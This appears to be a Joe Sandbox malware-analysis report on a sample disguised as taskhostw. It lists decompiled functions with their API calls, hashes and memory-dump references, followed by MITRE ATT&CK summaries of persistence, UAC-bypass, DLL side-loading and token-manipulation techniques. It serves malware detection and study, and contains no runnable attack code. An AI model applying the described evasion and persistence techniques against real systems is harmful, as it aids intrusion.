Part of subcall function 02A88D97: __itow.LIBCMT ref: 02A88DC2
Part of subcall function 02A88D97: __swprintf.LIBCMT ref: 02A88E0C

Part of subcall function 02A9F206: _wcscpy.LIBCMT ref: 02A9F229

Strings

@, xrefs: 02AFEA39

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memset$__itow__swprintf_wcscpy
String ID: @
API String ID: 2523036003-2766056989
Opcode ID: b4afbc4ec8ce6098afefaedd6866cb806fa6b13999c5cd6bd0421d5a68627add
Instruction ID: e15b74aa0d608e4a7e7d88d81dd8a4cb869efa3f6af87fb281b168e0c51116f9
Opcode Fuzzy Hash: b4afbc4ec8ce6098afefaedd6866cb806fa6b13999c5cd6bd0421d5a68627add
Instruction Fuzzy Hash: EC61AD75A006199FCB14EF94CA809AEBBF6FF48314F148459E946AB360DF34AD41CF94

Function 00D02AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D02AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00D02AE1

Strings

@, xrefs: 00D02AD5

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: dd90bb1d907bcce04fd5a28a6305cc668d4c21e9f4df596f534365667e49cf6f
Instruction ID: 5aad11f1a45e8451ce79a26c3cb92faab763ccbefc345533ac4a1f2dadd12159
Opcode Fuzzy Hash: dd90bb1d907bcce04fd5a28a6305cc668d4c21e9f4df596f534365667e49cf6f
Instruction Fuzzy Hash: 5C5159714187489BD760AF14DC86BAFBBE8FF88310F41885DF2D9811A1DB308529DB67

Function 02B06584 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02B0659C

Strings

0, xrefs: 02B06592
F, xrefs: 02B06694

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memset
String ID: 0$F
API String ID: 2102423945-3044882817
Opcode ID: 1c0eb870b8700fff3a399a86abb9af46b1e35f470247ba509b19d6def160a180
Instruction ID: 35e7cdbb1b1cf88fad7febd51cd983b8194249dfbaf15625be9f524dd0bb9d2f
Opcode Fuzzy Hash: 1c0eb870b8700fff3a399a86abb9af46b1e35f470247ba509b19d6def160a180
Instruction Fuzzy Hash: 4A415874A01209EFDB11DFA4D884EDEBBB9FF49300F144469E905A73A1D731A964CF94

Function 00D626A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D626B4
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D626EA

Strings

|, xrefs: 00D626BB

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 2b7bfbc5ba68cca06871dffb2f4d32c888b3782d3437c2af9e5ff61572b70887
Instruction ID: 2e6e0195a875ae3c2bd38b2b82ea9b5900eea04aa333d35e55ca363683393268
Opcode Fuzzy Hash: 2b7bfbc5ba68cca06871dffb2f4d32c888b3782d3437c2af9e5ff61572b70887
Instruction Fuzzy Hash: 91313771800219AFDF05EFA0CC85EEEBFB9FF08350F100169F905A6166EB319A56DB60

Function 00D76A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00D76B49
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00D76B85

Strings

static, xrefs: 00D76AE5

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: a3fe284bf74d90fdc61a33b4b5cee692c24b156cfdc7f4b98669be72fb29669c
Instruction ID: 056da014083f440d547fae280a66bab75690597e8795c094cb61cf1481afe1b3
Opcode Fuzzy Hash: a3fe284bf74d90fdc61a33b4b5cee692c24b156cfdc7f4b98669be72fb29669c
Instruction Fuzzy Hash: 20316A71100A04AAEB119F64C881BFB77A9FF89720F14C619F9A9D7190EB30EC91DB70

Function 00D52B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D52C09
GetMenuItemInfoW.USER32 ref: 00D52C44

Strings

0, xrefs: 00D52C02

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a9d602977379d2caa103a26136c3cbd19c7b79a918d52f389d3c692d2a55e291
Instruction ID: 21e406a70e4bd4a50156c4eb91094ce45acb226a88cbad1d1594921ab42aa42b
Opcode Fuzzy Hash: a9d602977379d2caa103a26136c3cbd19c7b79a918d52f389d3c692d2a55e291
Instruction Fuzzy Hash: 1D31C531600309EBDF349F58D9857BEBBB9EF06351F184019EC85A61A6D770AA4CCB31

Function 00D76706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D76793
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D7679E

Strings

Combobox, xrefs: 00D76760

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 09de9fdf5a2fb05e76184b26d292c145afc0ab10cddf74f666ce904d7e406c4e
Instruction ID: da5ad509e7111506944ce4a417d93c8f38c9245076d481048126d168b717acbc
Opcode Fuzzy Hash: 09de9fdf5a2fb05e76184b26d292c145afc0ab10cddf74f666ce904d7e406c4e
Instruction Fuzzy Hash: AC118675300608AFEF259F24DC81EBB376AEB883A8F158125F91C97290F671DC518770

Function 00D76C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00CF1D35: CreateWindowExW.USER32 ref: 00CF1D73
Part of subcall function 00CF1D35: GetStockObject.GDI32(00000011), ref: 00CF1D87
Part of subcall function 00CF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CF1D91

GetWindowRect.USER32(00000000,?), ref: 00D76CA3
GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00D76CBD

Strings

static, xrefs: 00D76C80

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6e82dc0834af44e7f6dcd62bde6408292033cc86113e867c06bdb7b7f98dab46
Instruction ID: cf3d3af0ad8499e6c868f25c8ecf9b06c85481b5d60ab9befde95f5964d05fa8
Opcode Fuzzy Hash: 6e82dc0834af44e7f6dcd62bde6408292033cc86113e867c06bdb7b7f98dab46
Instruction Fuzzy Hash: 52212C72510209AFDB15DFA8DC45AFE7BB8FB08314F048669FD59D2250E735E850DB60

Function 00D76952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00D769D4
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00D769E3

Strings

edit, xrefs: 00D769B8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 47f544f11f938b76e9555bf328fb909c20ed916b3ff656e476c1396b4a5641b5
Instruction ID: 9b2782aaf83d5f583d30efe140d159c14543f10050b5fcab44f4d81c1885b274
Opcode Fuzzy Hash: 47f544f11f938b76e9555bf328fb909c20ed916b3ff656e476c1396b4a5641b5
Instruction Fuzzy Hash: 03116A71500608ABEF108F74DC40AFB3769EB05368F648724FAA8971E0E731DC909B70

Function 00D52CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D52D1A
GetMenuItemInfoW.USER32 ref: 00D52D39

Strings

0, xrefs: 00D52D10

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 4af7b77fcdc294125d1ded3a174af3d3ba561ad5299bc4994a92181727dcc394
Instruction ID: 8f50f8625040a06deb762aacdb8fb875177d345ea0ddef6aa2375e80c70126da
Opcode Fuzzy Hash: 4af7b77fcdc294125d1ded3a174af3d3ba561ad5299bc4994a92181727dcc394
Instruction Fuzzy Hash: FB11B132D01214EBCF21DB58DC84BBD77B9AB17301F180122EC95AB2A0D771AD0D86F1

Function 00D622EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D62342
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D6236B

Strings

<local>, xrefs: 00D62333

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f19f86a0151219ff92ec9fbaa4c2f7b4efcb73b19a5914edd951310d75228881
Instruction ID: 8a4a638797b2bc8abb9b3a55f727578fc414ab4b81833b0ed1bfdc2c5d31dede
Opcode Fuzzy Hash: f19f86a0151219ff92ec9fbaa4c2f7b4efcb73b19a5914edd951310d75228881
Instruction Fuzzy Hash: 9C11C270501A25BFDB288F518C89EFBFB68FF06351F10812EF98996240E374A991D6F0

Function 00D490C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D4AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00D4AEC7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D49135

Strings

ComboBox, xrefs: 00D490D4
ListBox, xrefs: 00D490FF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b155fd56c8cb05852602fa3eaca426c3da77175df473ee92fcd1276e5f3d8379
Instruction ID: 76669704c18ef8b50e697781ac66adab1292d393a9361ee6daa5a6c251be4cde
Opcode Fuzzy Hash: b155fd56c8cb05852602fa3eaca426c3da77175df473ee92fcd1276e5f3d8379
Instruction Fuzzy Hash: 74012471A45319ABCB04FBA8CCA5CFEB369EF06320B140719F972672C2DA35581CA631

Function 00D48FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D4AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00D4AEC7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00D4902D

Strings

ComboBox, xrefs: 00D48FCC
ListBox, xrefs: 00D48FF7

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7714686ca54fb39eb6dbef0b8e1f7a91b888a80055d636db2a0d6c31eb142489
Instruction ID: f441da0ccd84cc83793249617462d719a91b9fae48801bb0ac00b2e204191b1d
Opcode Fuzzy Hash: 7714686ca54fb39eb6dbef0b8e1f7a91b888a80055d636db2a0d6c31eb142489
Instruction Fuzzy Hash: B601DB71B452086BCB24EBA4CCA6DFFB3A8DF05740F140129BA12672C1DE259E1CA672

Function 00D49044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D4AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00D4AEC7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00D490B0

Strings

ComboBox, xrefs: 00D49051
ListBox, xrefs: 00D4907C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: a8741d11626b5d8be559fefc2d9bb18d1845a9e4d73695ed2510a96916c12937
Instruction ID: dd6093e874fcfac6be4fac42f2034a87950cd32cec66c66732903c01119e02a2
Opcode Fuzzy Hash: a8741d11626b5d8be559fefc2d9bb18d1845a9e4d73695ed2510a96916c12937
Instruction Fuzzy Hash: 6B01F9B1B852086BCF14EBA5CD92EFFB3ACDF15300F1401257A1263282DA259F1CA272

Function 02AA60EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 02AA6110
__calloc_crt.LIBCMT ref: 02AA6129

Strings

K, xrefs: 02AA614E

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __calloc_crt
String ID: K
API String ID: 3494438863-4153964727
Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction ID: cb8253f0d6b84e526abff758e26e9722ddbbe1bf37987decaa1d94139d4c5970
Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction Fuzzy Hash: 38F0A971A447118BFFA48F15BD60BA96BDAEF40B20F04047BE105CF191DB3494854E98

Function 00D54FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00D54FED
_wcscmp.LIBCMT ref: 00D54FFF

Strings

#32770, xrefs: 00D54FF9

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 0c712f5ef5cf0c8b1ef8460c7211ce8464e749074cb764b3d0bacffd10346483
Instruction ID: 1ac91803c8f38632602a178a79dde5df173cef863ef113f060bc6dd07641918a
Opcode Fuzzy Hash: 0c712f5ef5cf0c8b1ef8460c7211ce8464e749074cb764b3d0bacffd10346483
Instruction Fuzzy Hash: 24E09233A003296AD720AB99AC09AA7F7ACEB45761F000166FD04D3151E960AA5587F1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
